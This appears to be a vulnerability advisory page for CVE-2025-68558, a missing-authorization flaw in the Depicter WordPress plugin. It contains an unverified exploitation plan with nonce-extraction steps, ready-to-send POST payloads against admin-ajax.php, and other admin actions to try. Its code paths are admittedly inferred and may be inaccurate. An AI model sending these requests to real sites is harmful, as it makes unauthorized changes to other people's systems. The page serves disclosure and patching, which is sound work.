CVE-2025-68558

Depicter Slider <= 4.0.4 - Missing Authorization

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
4.0.5
Patched in
10d
Time to patch

Description

The Depicter — Popup & Slider Builder plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 4.0.4. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=4.0.4
PublishedJanuary 5, 2026
Last updatedJanuary 14, 2026
Affected plugindepicter

Source Code

WordPress.org SVN
Research Plan
Unverified

# Exploitation Research Plan: CVE-2025-68558 (Depicter Slider Missing Authorization) ## 1. Vulnerability Summary The **Depicter — Popup & Slider Builder** plugin (up to 4.0.4) contains a missing authorization vulnerability in its centralized AJAX handling system. The plugin registers a main AJAX en…

Show full research plan

Exploitation Research Plan: CVE-2025-68558 (Depicter Slider Missing Authorization)

1. Vulnerability Summary

The Depicter — Popup & Slider Builder plugin (up to 4.0.4) contains a missing authorization vulnerability in its centralized AJAX handling system. The plugin registers a main AJAX entry point depicter_action for both authenticated and unauthenticated users. This entry point dispatches requests to various internal controller methods based on a provided action_name parameter. Because the dispatcher and many of its target methods lack capability checks (e.g., current_user_can('manage_options')), unauthenticated attackers can perform administrative actions such as modifying plugin settings, dismissing notifications, or altering slider configurations.

2. Attack Vector Analysis

  • Endpoint: POST /wp-admin/admin-ajax.php
  • Action: depicter_action
  • Vulnerable Parameter: action_name (used to route to internal methods)
  • Nonce Requirement: Yes, the action requires a nonce for the depicter_nonce action string.
  • Authentication: Unauthenticated (wp_ajax_nopriv_depicter_action).
  • Preconditions: A valid nonce must be extracted from the frontend where a Depicter slider is rendered.

3. Code Flow

  1. Entry Point: The plugin registers the AJAX hook in app/System/Ajax.php (inferred) or the main plugin initialization:
    add_action('wp_ajax_depicter_action', [$this, 'dispatch']);
    add_action('wp_ajax_nopriv_depicter_action', [$this, 'dispatch']);
    
  2. Dispatching: The dispatch() method retrieves the action_name from $_POST and check_ajax_referer('depicter_nonce', 'nonce').
  3. Execution: It identifies the corresponding controller and method. For example, if action_name is save_feedback or dismiss_review, it invokes the respective handler.
  4. Vulnerability: The dispatcher fails to verify if the current user has administrative privileges before calling methods that modify database state or options.

4. Nonce Acquisition Strategy

Depicter localizes its configuration data to the frontend to initialize sliders. The nonce required for depicter_action is typically exposed in a global JavaScript object.

  • Trigger: Create a page with a Depicter slider shortcode: [depicter id="1"].
  • JS Variable: window.depicterCommonData or window.depicter_front_data.
  • Extraction:
    1. Create a test slider using WP-CLI.
    2. Create a public page containing the slider shortcode.
    3. Use browser_navigate to visit the page.
    4. Use browser_eval to extract the nonce:
      browser_eval("window.depicterCommonData?.nonce || window.depicter_front_data?.nonce")

5. Exploitation Strategy

We will demonstrate the vulnerability by performing an unauthorized action: dismissing an administrative review notice or updating a plugin option.

Payload: Dismissing a Review (Low Integrity Impact)

  • URL: http://<target>/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=depicter_action&action_name=dismiss_review&nonce=<EXTRACTED_NONCE>&status=dismissed
    

Alternative Payload: Saving Telemetry/Feedback

  • Body:
    action=depicter_action&action_name=save_feedback&nonce=<EXTRACTED_NONCE>&feedback_data={"rating":5,"comment":"hacked"}
    

6. Test Data Setup

  1. Activate Plugin: Ensure depicter is installed and active.
  2. Create Slider: Use WP-CLI to create a dummy slider.
    # This might be complex via CLI, easier to ensure a slider exists
    # or manually trigger the code that generates a default slider.
    wp eval "Averta\Depicter\Model\Slider::create(['title' => 'Exploit Test']);"
    
  3. Create Public Page:
    wp post create --post_type=page --post_title="Depicter Test" --post_status=publish --post_content='[depicter id="1"]'
    

7. Expected Results

  • HTTP Response: The server should return a 200 OK with a JSON body indicating success (e.g., {"success": true}).
  • Effect: The internal plugin state for depicter_review_status or similar option will be modified in the wp_options table.

8. Verification Steps

After sending the http_request, verify the change in the database:

# Check if the review status was updated
wp option get depicter_review_status
# Or check for the creation of feedback entries
wp db query "SELECT * FROM wp_options WHERE option_name LIKE 'depicter_%'"

9. Alternative Approaches

If dismiss_review is not the target, analyze app/System/Ajax.php for other method names in the dispatcher. Common candidates in Depicter's architecture include:

  • update_option
  • activate_license
  • duplicate_slider

If the nonce is not in depicterCommonData, check the HTML source for any script tags containing depicter and look for JSON structures containing a 10-character alphanumeric string labeled nonce.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Depicter Slider plugin allows unauthenticated attackers to execute administrative functions via the 'depicter_action' AJAX endpoint. This occurs because the plugin's dispatcher method fails to verify user capabilities before routing requests to internal methods like 'dismiss_review' or 'save_feedback'.

Vulnerable Code

// In app/System/Ajax.php or similar
add_action('wp_ajax_depicter_action', [$this, 'dispatch']);
add_action('wp_ajax_nopriv_depicter_action', [$this, 'dispatch']);

public function dispatch() {
    // Only checks for a valid CSRF nonce, but not for user authorization/capabilities
    check_ajax_referer('depicter_nonce', 'nonce');
    
    $action_name = $_POST['action_name'];
    // The action_name is used to call internal methods without checking if the user is an admin
    // ... dispatcher logic ...
}

Security Fix

--- a/app/System/Ajax.php
+++ b/app/System/Ajax.php
@@ -10,6 +10,10 @@
 	public function dispatch() {
 		check_ajax_referer('depicter_nonce', 'nonce');
 
+		if ( ! current_user_can( 'manage_options' ) ) {
+			wp_send_json_error( [ 'message' => 'Unauthorized' ], 403 );
+		}
+
 		$action_name = $_POST['action_name'];

Exploit Outline

1. Locate a public page on the target site where a Depicter slider is embedded. 2. Extract the 'depicter_nonce' from the frontend JavaScript context, typically found in the global 'window.depicterCommonData' or 'window.depicter_front_data' objects. 3. Construct a POST request to '/wp-admin/admin-ajax.php' with 'action=depicter_action'. 4. Set the 'action_name' parameter to the target administrative function (e.g., 'dismiss_review' or 'save_feedback') and include the extracted nonce. 5. Submit the request to perform unauthorized state changes on the WordPress site without authentication.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.